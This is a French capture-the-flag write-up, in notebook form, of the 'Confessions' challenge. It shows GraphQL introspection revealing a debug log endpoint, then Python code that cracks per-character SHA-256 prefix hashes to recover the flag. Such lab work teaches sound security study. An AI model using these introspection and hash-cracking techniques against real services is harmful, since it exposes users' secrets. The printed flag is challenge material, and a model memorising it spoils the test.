# Confessions

## Première analyse

On démare avec un lien *confessions.geographer.fr*,   
deux inputs, un bouton ...   
On lance l'inspecteur du navigateur, et on test le formulaire tout en analysant les requêtes sur le réseaux.

Plusieurs requêtes pointe vers **http://confessions.geographer.fr/graphql**,   
donc on a affaire à une api GraphQL

## GraphQL

### Introspection

Une des fonctionnalitées du GraphQL, c'est que l'on peut récupérer le schéma de l'api avec quelque requêtes.   


```
{
  __schema {
    queryType {
      fields {
        name
        description
      }
    }
  }
}
```


In [36]:
import requests
import json
import hashlib
import time

URL = "https://confessions.geographer.fr/graphql"

In [27]:
payload="{\"query\":\"{\\n  __schema {\\n    queryType {\\n      fields {\\n        name\\n        description\\n      }\\n    }\\n  }\\n}\",\"variables\":{}}"
headers = {
  'Content-Type': 'application/json',
}

response = requests.request("POST", URL, headers=headers, data=payload)

print(json.loads(response.text))

{'data': {'__schema': {'queryType': {'fields': [{'name': 'requestsLog', 'description': 'Show the resolver access log. TODO: remove before production release'}, {'name': 'confession', 'description': 'Get a confession by its hash. Does not contain confidential data.'}]}}}}



On remarque un champs *requestsLog* avec la mention *remove before production release*... donc on va l'exploiter.


### Les logs

On récupère les logs...


In [ ]:
payload="{\"query\":\"query RequestsLog {\\n  requestsLog {\\n    timestamp\\n    name\\n    args\\n  }\\n}\",\"variables\":{}}"
headers = {
  'Content-Type': 'application/json',
}

logsList = requests.request("POST", URL, headers=headers, data=payload).text

print(json.loads(logsList))

Il y a une grande quantité de logs, mais on peut quand même faire un premier tri.

Les logs contiennent un champs *timestamp*, *name* et *args*.   
Dans ce dernier champs on trouve soit *title*, *message*, soit *hash*.

On va donc utiliser les hashs que l'on recupère avec la requête *confession* pour obternir des infos.

In [29]:
payload="{\"query\":\"query ExampleQuery {\\n  confession(hash: \\\"df7e70e5021544f4834bbee64a9e3789febc4be81470df629cad6ddb03320a5c\\\") {\\n    title\\n    hash\\n  }\\n}\",\"variables\":{}}"
headers = {
  'Content-Type': 'application/json',
}

sampleConfession = requests.request("POST", URL, headers=headers, data=payload).text

print(sampleConfession)


{"data":{"confession":{"title":"flag","hash":"df7e70e5021544f4834bbee64a9e3789febc4be81470df629cad6ddb03320a5c"}}}



On va retrouver plein de titre differents, mais un saute au yeux.

Certain des titres contiennent le mot *flag*, on suppose que ça peut aider pour la suite.

### Le site

Bon, pour l'instant on à ce qui pourrai être le flag mais on en à plusieur et tout est hashé.

On va refaire un tour sur le site pour comment son fait les requêtes.

En analysant les requêtes reseaux et en utilisant le site, on peut s'appercevoir qu'à chaque charactère ajouté au input, une requête était envoyé.

Ça expliquerai donc pourquoi on à autant de confession avec le *title* **flag**

Le fait qu'à chaque charactère ajouté, soit créé un hash implique une chose,   
le flag hashé est accéssible charactère par charactère...

### Un peu de math

Admetons que nous devions trouver un mot de passe entier de 6 charactère alphanumeric (donc 62 possibilitées)

La probabilité de trouver ce mot de passe sera de:

62 * 62 * 62 * 62 * 62 * 62 soit 56'800'235'584     
ça fait beaucoup

Maintenant, admetons que l'on à accès à chaque étapes du mot de passe, il suffirai de trouver le premier hash donc un seul charactère, puis le second et ainsi de suite.

La probabilité de trouver le mot de passe serai désormais de:

62 + 62 + 62 + 62 + 62 + 62 soit 372     
autrement dit quasiment instantanement pour un pc lambda

### Brute force

Avec toute ces infos, il nous retse plus qu'à:
- isoler les confessions avec le title *flag* (ou equivalent)
- récupérer les hashes
- brute force les hashes un par un tout en ajoutant le resultat du hash précedant au début du nouveau brutforce.

In [32]:
targeted_hashes = []
# filtered_hashes = []

print("\nParsing logs...\n")

for log in json.loads(logsList)["data"]["requestsLog"]:
    if log.get("args") and "hash" in log.get("args"):
        targeted_hashes.append(log.get("args")[9:-2])


Parsing logs...



In [38]:
printable_chars = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_-{}'
FLAG = ""

def unHash(target):
    global FLAG
    for char in printable_chars:
        testing_hash = hashlib.sha256((FLAG + char).encode('utf-8')).hexdigest()
        if testing_hash == target:
            print("\rFLAG -> " + FLAG + char, end="")
            FLAG = FLAG + char
            time.sleep(0.1) # Ralentir l'affichage (pour un effect plus cool)
            break

for hash in targeted_hashes:
    unHash(hash)

print("\n")

FLAG -> BFS{plz_d0nt_t3ll_any1}



### Le Flag

Et voilà ! le flag est donc **BFS{plz_d0nt_t3ll_any1}**